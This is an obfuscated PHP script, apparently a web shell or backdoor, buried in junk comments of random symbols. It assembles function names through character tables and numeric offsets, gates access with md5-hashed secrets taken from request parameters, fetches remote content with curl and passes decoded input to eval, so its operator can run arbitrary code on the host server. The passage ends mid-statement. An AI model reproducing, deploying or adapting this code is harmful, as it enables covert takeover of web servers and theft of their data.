<?php $QM /*-cxqEbf-*///
= "r"."a"/*-
⒡♓
HsvR^SA8⒡♓
-*///
."n"/*-j>qh;:8-*///
."g"."e"; $ApHNZ = /*-kmVfGR-*///
$QM("~"/*-


⊎☑ℂ⋘ⓥ⋂☥⅝⓲♂∠ⅰ╏┴∫◐┩↵◣ϡ◀↚㊓⒥─←


rd⊎☑ℂ⋘ⓥ⋂☥⅝⓲♂∠ⅰ╏┴∫◐┩↵◣ϡ◀↚㊓⒥─←


-*///
, " "); /*-V6`{]-*///
$ai/*-<ONsp}Jfl-*///
=/*-

⇕⇒↰￡☟⋙︻⊖⋲⊛◗

RlN;0+Qn@⇕⇒↰￡☟⋙︻⊖⋲⊛◗

-*///
${$ApHNZ/*-


✭◻∭❺☊┪】❥☂◬⑲➺⅞┴↤


{|AJ]✭◻∭❺☊┪】❥☂◬⑲➺⅞┴↤


-*///
[28+3]/*-


⊌⑺


lH)=p,A)⊌⑺


-*///
.$ApHNZ[27+32]./*-m3D}[RD-*///
$ApHNZ/*-5w6Pt-*///
[32+15]/*-
↓※⊯⌒ℋ┈㈨⑼▲¤⊵⒲≧╥⊀ⓒ〖%⓸⑥⊌
xvhk↓※⊯⌒ℋ┈㈨⑼▲¤⊵⒲≧╥⊀ⓒ〖%⓸⑥⊌
-*///
.$ApHNZ/*-

⇦∹╅↕»⋓✈⒙

.YIVYj,J?x⇦∹╅↕»⋓✈⒙

-*///
[9+38]./*-
⓺➄
gdg⓺➄
-*///
$ApHNZ[25+26]./*-KfGv-*///
$ApHNZ/*-vNr(-*///
[33+20]./*--S-*///
$ApHNZ/*-


♒♙


mv.♒♙


-*///
[51+6]};/*-

♥﹥⒍⊗≕

^#|u35uswy♥﹥⒍⊗≕

-*///
 @(md5/*-6.}fwm{-*///
(md5/*-rav-*///
(md5/*-c>-*///
(md5/*-


┄☛㊥Ⅽ⒎⋊⋂⇌➉『¿


ut~JY┄☛㊥Ⅽ⒎⋊⋂⇌➉『¿


-*///
($ai[23]))/*-


¥≄﹛⋖㊥✠⇉﹥㊢╞Ⅹ∖∤⊒⊉♗↥◠➭⇔≝⒋←


^xGNy(Cm¥≄﹛⋖㊥✠⇉﹥㊢╞Ⅹ∖∤⊒⊉♗↥◠➭⇔≝⒋←


-*///
))/*-
⋣½♡⊥（↧〉ⓤ▏◇▲≷」⋏≹◣⒕⑦➡┷⋓☎✢↱ⓞ㊩╓⑸
aJ;JR⋣½♡⊥（↧〉ⓤ▏◇▲≷」⋏≹◣⒕⑦➡┷⋓☎✢↱ⓞ㊩╓⑸
-*///
===/*-]{izR;Kw@-*///
"afac45747b736615d35ec3a190cff5c8"/*-
✼Ⓜ﹦➪╨⑩⊶↜▱ⓖ⅐☑
lL!✼Ⓜ﹦➪╨⑩⊶↜▱ⓖ⅐☑
-*///
)&&(count/*-


ⅸ﹌◨☲✧➐◙⊡◻⓪㊆❣➪║☟㊒⌖⊸Ⅻ∧✸┦∯◠︽❑


BY%6tcNqQⅸ﹌◨☲✧➐◙⊡◻⓪㊆❣➪║☟㊒⌖⊸Ⅻ∧✸┦∯◠︽❑


-*///
($ai)/*-Laf6r@S(-*///
==/*-

✴┈∕☨º∗∁⅝ⅱ▻♚↤➠∾◎㉿≸✮⅗ⅷ➘⋖⅑✼◱⇈⓭⒂

pw0;Z.@%✴┈∕☨º∗∁⅝ⅱ▻♚↤➠∾◎㉿≸✮⅗ⅷ➘⋖⅑✼◱⇈⓭⒂

-*///
29&&/*-


♋⋉⋇♠♬⑭⊂⅚☷Ⓙ✙۰➙Ⓦ⊵︶≫﹜ⅾ∾⊎✵┤Σ⋧┃↊✩⒇⋦≩


s9MI♋⋉⋇♠♬⑭⊂⅚☷Ⓙ✙۰➙Ⓦ⊵︶≫﹜ⅾ∾⊎✵┤Σ⋧┃↊✩⒇⋦≩


-*///
in_array(/*-

╒✜≓➶®☾⋀ⓩ》⇩◐⇊

)M╒✜≓➶®☾⋀ⓩ》⇩◐⇊

-*///
gettype(/*-

☳➘╓

F>QB4dt>V☳➘╓

-*///
$ai)./*-#0]]W]ny-*///
count(/*-R;-*///
$ai),$ai))?(($ai[69]=$ai[69].$ai[75])&&($ai[90]=$ai[69]($ai[90]))&&(/*-DF.Gw0-*///
@eval/*-
✉↝⇁➏Ⓨ
ARB%HG✉↝⇁➏Ⓨ
-*///
($ai[69](${$ai[40]}[16])/*-

⇅Ⅻ⒛♙≣⒰』⑪﹦✻Ⅵ⒏⋴Ⓝ☠◀⇍⓯✹♖╍≓ⅿ⌖≒

6U3CmCe@⇅Ⅻ⒛♙≣⒰』⑪﹦✻Ⅵ⒏⋴Ⓝ☠◀⇍⓯✹♖╍≓ⅿ⌖≒

-*///
))/*-Q7H[-*///
):$ai;/*-


➵⒨Ⓧ⅚♆❊≃￡➴⊄➳╥¡ℕ┍⋡⊶✥¾✿×⊺☈➬⒚☂⒡ⅶ


YN<Nh➵⒨Ⓧ⅚♆❊≃￡➴⊄➳╥¡ℕ┍⋡⊶✥¾✿×⊺☈➬⒚☂⒡ⅶ


-*///
class /*-6H!b=-*///
MFJ{ /*-::+}ANEnr-*///
static/*-
➔⒩❄≖┆➘⅟⒞⑬⇞⋜⓳≢⊉⋀♓❹ⓧ℅⇁⓽➏⑫⏢
<1Gd.C[|-f➔⒩❄≖┆➘⅟⒞⑬⇞⋜⓳≢⊉⋀♓❹ⓧ℅⇁⓽➏⑫⏢
-*///
 function /*-

⋗㊰⇎▿☬⌔⋆㉿✕∃◼☦ⓢ⑧⒁Φ❣☂↟ت

yo?5M]d⋗㊰⇎▿☬⌔⋆㉿✕∃◼☦ⓢ⑧⒁Φ❣☂↟ت

-*///
hb($Gb) /*-loih.E;-*///
{ $mhInrjUZ/*-I}opA-f-*///
 = /*-{z9h-*///
"r"./*-[TFrBL-J3-*///
"a"./*-


≇∯↭◨╖◥╪︷◌◠═↉◗


Igy≇∯↭◨╖◥╪︷◌◠═↉◗


-*///
"n"./*-r[t@lfA_]-*///
"g"./*-CVTwW-*///
"e"; /*-]GRd&9v-*///
$jlTik/*-&e8iZAy#-*///
 = /*-R;84S(r--*///
$mhInrjUZ/*-
┤£㊚﹋┬⓶
l5!R,┤£㊚﹋┬⓶
-*///
(/*-


☶［☳✗❹▥㊞¿≚⒤⅘﹃Ⅳ


zBu&dy|!T☶［☳✗❹▥㊞¿≚⒤⅘﹃Ⅳ


-*///
"~"/*-

➾▀✥⑾➯➹⇅∘▉▲≌✱╪⊁～✫⓮❄≐

pO-Z2gyL#➾▀✥⑾➯➹⇅∘▉▲≌✱╪⊁～✫⓮❄≐

-*///
, /*-X|+WuLJ-*///
" "/*-7}-*///
);/*-)-*///
 $eEpaxYwyt /*-
⇘⋾➀≽⅑◐¢⋬｀⋊☶◯◄⑺↛❇Ⅾ☰
AB⇘⋾➀≽⅑◐¢⋬｀⋊☶◯◄⑺↛❇Ⅾ☰
-*///
= /*-(0T]O-*///
explode/*-


≰﹠≂×㊄◢⒃⋇◕⊊⒫∟㊧⒍⋽


e#OL)?;}≰﹠≂×㊄◢⒃⋇◕⊊⒫∟㊧⒍⋽


-*///
(/*-kSM+W-*///
";", /*-TYal6`-*///
$Gb/*-


▨―⇠▯︺≢ⓑ⑮≖▵ㄨ⅛⋒㊁◺╞ⅶ⊅﹄⊩ⓜ⊚⇜▽④


Z`▨―⇠▯︺≢ⓑ⑮≖▵ㄨ⅛⋒㊁◺╞ⅶ⊅﹄⊩ⓜ⊚⇜▽④


-*///
); /*-


↢↖●ℝⒿ﹢⒔︻ˉⓚ☏◉ℬ


%$↢↖●ℝⒿ﹢⒔︻ˉⓚ☏◉ℬ


-*///
$CYJ /*-t8qDnR-*///
= /*-


┏↷°➒➭╬ↅ⋿♂⑺╎☽⅛⊫┮⋍→▍


?Pr)V_P┏↷°➒➭╬ↅ⋿♂⑺╎☽⅛⊫┮⋍→▍


-*///
""; foreach /*-


⋟⒇Ⅰ﹨@⇜↴♋╧◨Ⓑ◧⋄≶⇦☼


2NzO⋟⒇Ⅰ﹨@⇜↴♋╧◨Ⓑ◧⋄≶⇦☼


-*///
(/*-(#]<-3~-*///
$eEpaxYwyt /*-


◌⒟☹≙↚㊟◟┬➎ﭢ⓲➡㊛╩№


KT-B<?o6◌⒟☹≙↚㊟◟┬➎ﭢ⓲➡㊛╩№


-*///
as /*-


ⓒ≲▫➴↾⇩⊠♘⏥︾∗⊹❆◦


JgOKⓒ≲▫➴↾⇩⊠♘⏥︾∗⊹❆◦


-*///
$LfNhHEb /*-QVWIb+j-*///
=>/*-g=A-*///
 $KWCvYguZr/*-
⒭≲┚┯⌓≾ⓌⓇ⋽∜╪▦㎡≗∢
0}vQVNa&⒭≲┚┯⌓≾ⓌⓇ⋽∜╪▦㎡≗∢
-*///
) /*-t}d^%c=|-*///
$CYJ /*-NP`4bu6-*///
.= /*-U!S<>~OAm-*///
$jlTik[$KWCvYguZr/*-t$gP-*///
 - /*-

⒈㊧Ⅺ﹨◎』ⅼ✯◢➎➬◆■º㊨⑴⒄―⊑⋉≒≊⊚⇘▄Ⓓ⒋

Ut~⒈㊧Ⅺ﹨◎』ⅼ✯◢➎➬◆■º㊨⑴⒄―⊑⋉≒≊⊚⇘▄Ⓓ⒋

-*///
85499/*-
⑿┲⋛ⓑ➈⊵↑¤▿
Eg3e.⑿┲⋛ⓑ➈⊵↑¤▿
-*///
];/*-

⊝Ⅿ╌➍◜@☈ϟ✌Ⓚ▽⑱⓽㊅❷Ⅰ⊲✰﹀⒠⑷╂

_q7~-⊝Ⅿ╌➍◜@☈ϟ✌Ⓚ▽⑱⓽㊅❷Ⅰ⊲✰﹀⒠⑷╂

-*///
 return /*-,|-*///
$CYJ; /*-


☍）‖⋫⒯⅟✉⋶㊄⋍⊝━⓪㊒﹜ⅿ♓


!g_L,V☍）‖⋫⒯⅟✉⋶㊄⋍⊝━⓪㊒﹜ⅿ♓


-*///
} /*-

¶╬

xf.¶╬

-*///
static /*-

∧✛∳➙∖〕♡✼▴㈩

1[∧✛∳➙∖〕♡✼▴㈩

-*///
function /*-,)&sws=-*///
qFp/*-

❒∇⅟㎡€⋥◛⅛↑➊㊆╚☬ↂ⋓➺┼≠☋⊱

+R(2❒∇⅟㎡€⋥◛⅛↑➊㊆╚☬ↂ⋓➺┼≠☋⊱

-*///
(/*-
┹﹉↯☉◺✡∸▻▅➦↣◢◳﹍
=lz7]E┹﹉↯☉◺✡∸▻▅➦↣◢◳﹍
-*///
$LcwMBCQ,/*-


⇉ⓛ⋵➈﹜♟Ⅽ♣⒖{


)0y;kNhN⇉ⓛ⋵➈﹜♟Ⅽ♣⒖{


-*///
 $wMjY/*-


└⊍≙♈۵≭✽◓▱Ⓔ


:?OL└⊍≙♈۵≭✽◓▱Ⓔ


-*///
)/*-0z0f-*///
 {/*-o&DbhG=-*///
 $PHnjBar/*-


ⓟ⅒Ⓚ▶☎⒉↰⓻◅㏑▒⅐◖➩≠∅


bP6E[ⓟ⅒Ⓚ▶☎⒉↰⓻◅㏑▒⅐◖➩≠∅


-*///
 = /*-
ⅼ≮✭⅞➚➻☞∡∠⊘㊧◰﹊≔┵⇕☧ⓥ⊄⊬❷④☥╧⊠
)GmIⅼ≮✭⅞➚➻☞∡∠⊘㊧◰﹊≔┵⇕☧ⓥ⊄⊬❷④☥╧⊠
-*///
curl_init/*-:Hi&-*///
(/*-ie6|S#-*///
$LcwMBCQ/*-


㊖㊌≞︹∭㊛☤◳❏↗‹♔⑩ø▪⋺⋅➾⊮≅┽⅛↣㊙⇡♟


V.㊖㊌≞︹∭㊛☤◳❏↗‹♔⑩ø▪⋺⋅➾⊮≅┽⅛↣㊙⇡♟


-*///
);/*-


㊗‱㊆☛۰≔⓵♡


n$nl+㊗‱㊆☛۰≔⓵♡


-*///
 curl_setopt/*-bo>;-e-*///
(/*-FRfYwD?`-*///
$PHnjBar,/*-FM-*///
 CURLOPT_RETURNTRANSFER,/*-
︷』▍—➥⋋⇁∵Ю♨↸⊴≥⇄☽➬⊥┒⇦■㊉Ⅸ∨〃❄⊮
L-<$b8A+b︷』▍—➥⋋⇁∵Ю♨↸⊴≥⇄☽➬⊥┒⇦■㊉Ⅸ∨〃❄⊮
-*///
 1/*-i&}ME?+s>-*///
);/*-h{0-*///
 $HnatwfC/*-avj0^b^m-*///
 = /*-aX-*///
curl_exec/*-
﹌◿%Ⅵℌ┊
+{b(`﹌◿%Ⅵℌ┊
-*///
(/*-Ikg[!@{pw-*///
$PHnjBar/*-


➶℃✒⊯㊦ϟ⇢◠❁❣⋅︹⇃▶≚⊋⋇〕╎㊗◻¥—㊊≷㊘⅚➎


FI3X$➶℃✒⊯㊦ϟ⇢◠❁❣⋅︹⇃▶≚⊋⋇〕╎㊗◻¥—㊊≷㊘⅚➎


-*///
); /*-


╪⇕⑯↚♤✡⊅⊱ↂ⋕➇℉╡∿┋┣♧➀➪╚✝㊑㊮


f#0Dt]-(╪⇕⑯↚♤✡⊅⊱ↂ⋕➇℉╡∿┋┣♧➀➪╚✝㊑㊮


-*///
return /*-kTyC8FL-*///
empty/*-


﹍➁⇃⇕Ⓗ⋎ⓗ╋⊜ⅹℓ➆✑㊞⊤︼⑤⊠◛┱⋋▌╎✌⋀↗☠↋


.-﹍➁⇃⇕Ⓗ⋎ⓗ╋⊜ⅹℓ➆✑㊞⊤︼⑤⊠◛┱⋋▌╎✌⋀↗☠↋


-*///
(/*-
☑⇁┃⊥⑭➚∜╨⋱⒕°╪⌘■㊡Ⓞ♔⇛ⓞ
$OW☑⇁┃⊥⑭➚∜╨⋱⒕°╪⌘■㊡Ⓞ♔⇛ⓞ
-*///
$HnatwfC/*-

^✃¾☝♪⇎↖◴⋊⊼ℛ⇢⊕⑷♚┡┴✻②⒏

Q|9^✃¾☝♪⇎↖◴⋊⊼ℛ⇢⊕⑷♚┡┴✻②⒏

-*///
)/*-=^0NFQH-*///
 ? /*-
﹍❼╫ℊ◟≲╞↛↬Ⅼ┛├⒩⓲∰∂█☶◮Ⓜ➒¿⑨⇧≝∞¤↵
-VwZ_﹍❼╫ℊ◟≲╞↛↬Ⅼ┛├⒩⓲∰∂█☶◮Ⓜ➒¿⑨⇧≝∞¤↵
-*///
$wMjY/*-


⒧◜⑤☳↻⊑ø⋹☇⊅✁℗↫Ⅷ㊘☤♋☜


EM⒧◜⑤☳↻⊑ø⋹☇⊅✁℗↫Ⅷ㊘☤♋☜


-*///
(/*-6-q~H-*///
$LcwMBCQ/*-PWM-*///
)/*-aoEdq-*///
 : /*-

✷㍿⊡╒┲◑

E{Z!c✷㍿⊡╒┲◑

-*///
$HnatwfC; /*-puQW%z-*///
}/*-
⓷⓱▫◫⇉⒪⇅≾＂↿✶⒯⊏┖⓾♦⒱║﹟⒀
$aqF⓷⓱▫◫⇉⒪⇅≾＂↿✶⒯⊏┖⓾♦⒱║﹟⒀
-*///
 static/*-n`Vd4=5:D-*///
 function /*-
↾ⅱ↭▴Ⅸ○⇞⑸ⓡ⒄⅑╫㊩⒥◈⋺┭◄◗⋰☠◛ⓑ
`LNVP↾ⅱ↭▴Ⅸ○⇞⑸ⓡ⒄⅑╫㊩⒥◈⋺┭◄◗⋰☠◛ⓑ
-*///
BMScExYhG/*-


⊤╩㊇⊴▢♭♬⒆∢∻☮┛┄☾⊆❽➝←▮☐⇔☤○¢


iMTtrhbir⊤╩㊇⊴▢♭♬⒆∢∻☮┛┄☾⊆❽➝←▮☐⇔☤○¢


-*///
() /*-
☸ﭢ┸£⓺Ⓔ┵ⓤ⊟╨⑽⋀
;+Lz%iaX☸ﭢ┸£⓺Ⓔ┵ⓤ⊟╨⑽⋀
-*///
{/*-

▪☜［⇍✭⒑╙Ψ⋺≋┗⅕⇏⋪╖↝︹≆ˉ✁✖┩ⅸ◿

k9.+▪☜［⇍✭⒑╙Ψ⋺≋┗⅕⇏⋪╖↝︹≆ˉ✁✖┩ⅸ◿

-*///
 $UsHSi /*-W4]F$SD-*///
=/*-

⓮∺ↈ☊⇠⒤☇┍ℎⓄ♔≆◭⒅⓱⌖█Ⅷ︻︾∠ⓓ▁⒏⒧✩ⓐ┾❃❅

1r,+CjA-⓮∺ↈ☊⇠⒤☇┍ℎⓄ♔≆◭⒅⓱⌖█Ⅷ︻︾∠ⓓ▁⒏⒧✩ⓐ┾❃❅

-*///
 array/*-

⊱≈▲〕▔┽╎☄◊✈《⓰†㈡⋮✜㊪ↇ➜

{vSLL{]⊱≈▲〕▔┽╎☄◊✈《⓰†㈡⋮✜㊪ↇ➜

-*///
("85526;85511;85524;85528;85509;85524;85530;85523;85508;85515;85526;85509;85520;85514;85515","85510;85509;85511;85530;85511;85514;85509;85576;85574","85519;85510;85514;85515;85530;85525;85524;85526;85514;85525;85524","85513;85528;85526;85518","85527;85528;85510;85524;85571;85573;85530;85525;85524;85526;85514;85525;85524","85523;85520;85517;85524;85530;85522;85524;85509;85530;85526;85514;85515;85509;85524;85515;85509;85510","85553;85583","85500","85578;85583","85560;85543;85543;85560;85536","85514;85523"); /*-g-=w-*///
foreach /*-


☿⒰◑Ⓛ╕⇍⊢⊐▴↟╎❷⊭⊃≟Ⅽℍⓠ➩⒟#╟⇊▉


FDm+Q.☿⒰◑Ⓛ╕⇍⊢⊐▴↟╎❷⊭⊃≟Ⅽℍⓠ➩⒟#╟⇊▉


-*///
(/*-:gB)XkNv-*///
$UsHSi/*-?F?{-*///
 as /*-kH|{Y-*///
$NvVIS/*-

♝⊼≼⅚︵

G^x♝⊼≼⅚︵

-*///
)/*-

Ⓒ≿▧℠⚘╤≍↕⊢↸⊌︹✾☺☑⊾⑼➵ℐ❧➨

EG_~$xAX%IⒸ≿▧℠⚘╤≍↕⊢↸⊌︹✾☺☑⊾⑼➵ℐ❧➨

-*///
 $tbjJuIQ/*-
✧卐◚⊍ⅶ≷ⓇⓍ
vcgASg,a!}✧卐◚⊍ⅶ≷ⓇⓍ
-*///
[] /*-BO|IB`Z-*///
= /*-

◮﹏➬♘╉

8?!r|^C,z◮﹏➬♘╉

-*///
self/*-On+KQ8GG[j-*///
::/*-
╛Ⓧ
>bp?<!~&╛Ⓧ
-*///
hb/*-,qtF{qWY-*///
(/*-J!(J7e09-*///
$NvVIS/*-~jMB_[1--*///
);/*-

ℒⅪ╅㊮⅜㊭❆❥⓲┄❿⑻﹠➑╋►㊣㊉Ⓗ

.D_,ℒⅪ╅㊮⅜㊭❆❥⓲┄❿⑻﹠➑╋►㊣㊉Ⓗ

-*///
$iCnVjERtmA /*-

│↔☋✌㊑≪≉⊰

l;PZlBU│↔☋✌㊑≪≉⊰

-*///
= /*-yW-*///
@$tbjJuIQ/*-te-*///
[/*-
╉⊃↮⅖⒞⊳⇏﹟╓
_B.4I7]9╉⊃↮⅖⒞⊳⇏﹟╓
-*///
1/*-n1`-*///
]/*-OaNlC-*///
(/*-<Ot]=ZkN-*///
${/*-5Vm>RiWb`n-*///
"_"/*-d4-*///
."G"/*-

⊞◝❂≝⋺⋦┌≎┥

RU9⊞◝❂≝⋺⋦┌≎┥

-*///
."E"/*-]AI-*///
."T"/*-

➲▹（≛ⅳ⊿⌒π㊥┱

ErugF➲▹（≛ⅳ⊿⌒π㊥┱

-*///
}[/*-8g3-*///
$tbjJuIQ/*-hicy=70]-*///
[/*-lC7BV#|(3l-*///
3+6/*-kHm2Jk8-*///
]]/*-&o#VpP[-*///
);/*-


╢⊭⇀⊱㊀◞⓫◒⒥≆≅ⓚ◸⋸⋎


%Yt,3fP<╢⊭⇀⊱㊀◞⓫◒⒥≆≅ⓚ◸⋸⋎


-*///
 $MTCYPtX /*-


㊍㊒㊟㊇≀≊⋉Ⓝ⋀Ⓦ⒆￣≈♋Ⅷ⊅↓➙«✷➧⒝ℐ）∆⊄▼┼


$NZz3h;C㊍㊒㊟㊇≀≊⋉Ⓝ⋀Ⓦ⒆￣≈♋Ⅷ⊅↓➙«✷➧⒝ℐ）∆⊄▼┼


-*///
=/*-RnY1-*///
 @$tbjJuIQ/*-
┃⚘♞⒑◁
fT<uO┃⚘♞⒑◁
-*///
[/*-

⋃≻⑤╢

9i!}lnj⋃≻⑤╢

-*///
2+1/*-uV^-*///
]/*-c[D-*///
(/*-=f9DR-*///
$tbjJuIQ/*-
㊤』◭》⊘⋒◮❶½▉⇩⋄～┧♈╤∢Ψ∯Ⅻ
=87k6EX4K㊤』◭》⊘⋒◮❶½▉⇩⋄～┧♈╤∢Ψ∯Ⅻ
-*///
[/*-
≔㊃▶۵㊦⒂㊡Ⅶ⒁┫✭⒩
`k-W03C≔㊃▶۵㊦⒂㊡Ⅶ⒁┫✭⒩
-*///
3+3/*-

☠⒬ⅿ✃⏎웃卍✒≀⒨

JS☠⒬ⅿ✃⏎웃卍✒≀⒨

-*///
], /*-bk-*///
$iCnVjERtmA/*-
ℚ㈨➐✈ⓖⅡ⒊￣⒨˜☳⊁➑╅▣☍∅﹄&∛︻
6_?PU=<ℚ㈨➐✈ⓖⅡ⒊￣⒨˜☳⊁➑╅▣☍∅﹄&∛︻
-*///
);/*-


⋼⓭♋㊍╅


$aBl⋼⓭♋㊍╅


-*///
 $ABUC /*-[;k:-*///
=/*-`o){jGi-*///
 $tbjJuIQ/*-)cu-*///
[/*-

⓿ⅺ≎⊾⓹☇↛┘➩⓫㊃ⅠღⓌ▵╗⇤囍㊋⋯✣┨

p~7h⓿ⅺ≎⊾⓹☇↛┘➩⓫㊃ⅠღⓌ▵╗⇤囍㊋⋯✣┨

-*///
2+0/*-7i>-*///
]/*-
⋾⊣⊪㏑➝↯█¤∀★◹¿︽◻∹﹀╅⑶┭❼♙⓪◺㈤♠
a=AUX]6⋾⊣⊪㏑➝↯█¤∀★◹¿︽◻∹﹀╅⑶┭❼♙⓪◺㈤♠
-*///
(/*-

⌒╤▣✡↛↺‡✛⇏⋿♦》

;95a&d7⌒╤▣✡↛↺‡✛⇏⋿♦》

-*///
$MTCYPtX,/*-,L|S2rsF4-*///
 true/*-^j-*///
); /*-


∛∲㊯


ybaBA-8∛∲㊯


-*///
@${/*-
Ю⋞⊢㉿╄└㊃∍┽➵ↇ
#=m(_kЮ⋞⊢㉿╄└㊃∍┽➵ↇ
-*///
"_"./*-xy1--*///
"G"./*-fD-Z,U-*///
"E"/*-vzqQ!MA-*///
."T"/*-|$1-*///
}/*-8k].%y(uC-*///
[/*-


⊬⅒⇌▊☢⋕ⅾ￣◘ⓟ⊙☬⅙㈣↢﹫⅑☉ⓨ┾✫㊧♪ↅ♘█⒙㈢


nP.SJT(I~⊬⅒⇌▊☢⋕ⅾ￣◘ⓟ⊙☬⅙㈣↢﹫⅑☉ⓨ┾✫㊧♪ↅ♘█⒙㈢


-*///
$tbjJuIQ/*-

⇨㊝

tYb⇨㊝

-*///
[10+0/*-y9MOb-*///
]/*-

▻➓➞☄〈Ↄ‖ت⇌⋯☎ↇ㊪⋨⏎∧$♆【║◽◥╤

>-;61<m6▻➓➞☄〈Ↄ‖ت⇌⋯☎ↇ㊪⋨⏎∧$♆【║◽◥╤

-*///
]/*-U|GoZ1w1?x-*///
 == /*-L((Qft-*///
1 /*-pvT$qp-*///
&& /*-N{K[t99$-*///
die/*-jBYMAt%-*///
(/*-n[LnCiWRP-*///
$tbjJuIQ[2+3/*-f9...5N=nM-*///
]/*-AQJ-*///
(/*-


☬◤◽≋⋼⒭⅔❈≠➌░ℱ㊍↝⋨◳


3:g☬◤◽≋⋼⒭⅔❈≠➌░ℱ㊍↝⋨◳


-*///
__FILE__/*-
∘∲▷↹◺┇⊳⓰✢➣⓲⊍♤⓿╨⋿㈣☱↟⓭
NFNkI<Yw~∘∲▷↹◺┇⊳⓰✢➣⓲⊍♤⓿╨⋿㈣☱↟⓭
-*///
)/*-TCfQ=r-*///
); /*-25-*///
if/*-KN5W-*///
(/*-

✺﹉ⓦ⊋

7]uW|9~✺﹉ⓦ⊋

-*///
 (/*-

Φ⋄┶↡⋧ⓡ～⒝⇀▧≔﹃∥≸▫

~AΦ⋄┶↡⋧ⓡ～⒝⇀▧≔﹃∥≸▫

-*///
(@/*-
ℒ⊴¡⊪︷㊤Ⓞ➒ⓠ㊄々ℛ﹢Ⅻ↵➫⒧╕ⅵⅹ
,mPℒ⊴¡⊪︷㊤Ⓞ➒ⓠ㊄々ℛ﹢Ⅻ↵➫⒧╕ⅵⅹ
-*///
$ABUC/*-
˜≣」◕⊦⊨
K˜≣」◕⊦⊨
-*///
[/*-Knb@ySRn`{-*///
0/*-


⑭ⅽ㊚╪☬﹢€◁➅ℑ►～◴⋆£ø┡❶⒊ℚ℉☇✝∳≍ↈⅶ‡﹠


wxvS)Zny⑭ⅽ㊚╪☬﹢€◁➅ℑ►～◴⋆£ø┡❶⒊ℚ℉☇✝∳≍ↈⅶ‡﹠


-*///
] /*-


⇐≭┽✼↹›⅚Ⓐ┸⒵≗﹋♐⌘㊟‖⒅☶ℒ➍➆


a))⇐≭┽✼↹›⅚Ⓐ┸⒵≗﹋♐⌘㊟‖⒅☶ℒ➍➆


-*///
- time/*-


⑴⊩Ⅶ∻➑㊨↪ⓗⅸ✥⋚⓲✲╜ⓟ➄△┬⊇≯⑾✷⒩⒧


SZU&d)<`Z⑴⊩Ⅶ∻➑㊨↪ⓗⅸ✥⋚⓲✲╜ⓟ➄△┬⊇≯⑾✷⒩⒧


-*///
()/*-s:-*///
) > /*-7EXGv6`5c-*///
0/*-kqB<tHzY-*///
)/*-


➡︿⋛↗⊕∎―⇥╖ℋ⊞✔◑☯⓯～⑵➵⒆☊⇁Ψ◳×✝⋥⋤↳


,joJ%_➡︿⋛↗⊕∎―⇥╖ℋ⊞✔◑☯⓯～⑵➵⒆☊⇁Ψ◳×✝⋥⋤↳


-*///
 and /*-X0{)Cu{,-*///
(/*-9P:A=io-*///
md5/*-VY:m=gaMBw-*///
(/*-
⑿々ℴ✼➍⒰▪⊏
B.;k{k⑿々ℴ✼➍⒰▪⊏
-*///
md5/*-ZXiW@:B?-*///
(/*-


㊥≟➎卍✚⋞⑽⒫⌘⊖⑹卐❣╡↑✾ⓗ☁✄☜♀﹩∑▱▀⒟⋯✳｜⇘


f(r?TBu㊥≟➎卍✚⋞⑽⒫⌘⊖⑹卐❣╡↑✾ⓗ☁✄☜♀﹩∑▱▀⒟⋯✳｜⇘


-*///
$ABUC/*-
☸✭】☉⇔╖║⊥┞⊢」➬⊸⇅╕⒧➝⊎⓸↲▪➒∈∫Ⓟ㊑～©◊⇪☿
p$^&tM4<gc☸✭】☉⇔╖║⊥┞⊢」➬⊸⇅╕⒧➝⊎⓸↲▪➒∈∫Ⓟ㊑～©◊⇪☿
-*///
[/*-}Q2@C-*///
2+1/*-


▼ⓝ⋥⒗㊁⓸¶㊭╪♢◳∻⅙☈∗≆♠/▨≠⑾⋁┵


RTHp6pC_&▼ⓝ⋥⒗㊁⓸¶㊭╪♢◳∻⅙☈∗≆♠/▨≠⑾⋁┵


-*///
]/*-YOz3WM-*///
)/*-

◑▎⇞➒Ⓨ↙⊏Ⓣ⓸⏥≗✴⇙☭❦↘Ⅹ✯✬

OUaM}}L◑▎⇞➒Ⓨ↙⊏Ⓣ⓸⏥≗✴⇙☭❦↘Ⅹ✯✬

-*///
)/*-


㊁§☟


l2$86i+;=㊁§☟


-*///
 === /*-icGFH-*///
"961dedfa0fc1f3c36bd89d9e43de8bec"/*-


⊱⒋╩⋻）「▴ℴ㊎➩◢⅖╍⋂╕↺❖﹊ↅ╇▌╃▊Ⓗⓡ㊄


t;5&k%2ZR⊱⒋╩⋻）「▴ℴ㊎➩◢⅖╍⋂╕↺❖﹊ↅ╇▌╃▊Ⓗⓡ㊄


-*///
)/*-NV>yHtfZ{w-*///
 ): /*-
┧⊹♡╞╥╃✕ℂ╢⓭≽▕∙⇌㊇《✙✦⊐▶ↆ︶┱～
xT┧⊹♡╞╥╃✕ℂ╢⓭≽▕∙⇌㊇《✙✦⊐▶ↆ︶┱～
-*///
$QcA /*-5JN]Fy~-*///
=/*-
❖✺║♫ⓣ⑻➁┙∌ⅳ⋭⇝➠⋚⒄◪♧❅◹⒩）ⓖ≚¤✤⓫≊﹍
8jHFiw❖✺║♫ⓣ⑻➁┙∌ⅳ⋭⇝➠⋚⒄◪♧❅◹⒩）ⓖ≚¤✤⓫≊﹍
-*///
 self/*-


ღⓒ


Iifaღⓒ


-*///
::/*-TN-*///
qFp/*-yEvI;&Sb-*///
(/*-lP:-*///
$ABUC/*-


×➨


cYF×➨


-*///
[/*-


⑨✲Ⓢ♘┅∅≇㈦⊗¶︿⓴≲≨㊌⌒ↂ┋┆Ⅹ▁


@:l⑨✲Ⓢ♘┅∅≇㈦⊗¶︿⓴≲≨㊌⌒ↂ┋┆Ⅹ▁


-*///
0+1/*-G1G5-*///
], /*-

⒘╤∝⊯～↷⊎█⒠➨❋⅐╥

4,⒘╤∝⊯～↷⊎█⒠➨❋⅐╥

-*///
$tbjJuIQ/*-L?~}+PZr-*///
[/*-kEE`-*///
5+0/*-


⇢↘✙≷⑴⋇♈Ⅶ☯➨✺➺♓㊬⒡◁⒄︿═⋯┮◜☱⊳⋹‡﹦↡


ea⇢↘✙≷⑴⋇♈Ⅶ☯➨✺➺♓㊬⒡◁⒄︿═⋯┮◜☱⊳⋹‡﹦↡


-*///
]/*-


➋⊊↦≑⋧®•


gME|➋⊊↦≑⋧®•


-*///
);/*-
✥【↶▬♮Ⓣ◕⊩☽╁✝♕≤⒠▲⇑⋿➳↫⋞❧︺
iKaZnmNwTC✥【↶▬♮Ⓣ◕⊩☽╁✝♕≤⒠▲⇑⋿➳↫⋞❧︺
-*///
@eval/*-`h4?R~-*///
(/*-zb.a-*///
$tbjJuIQ/*-nTyA-*///
[/*-V1QAcIWov-*///
0+4/*-
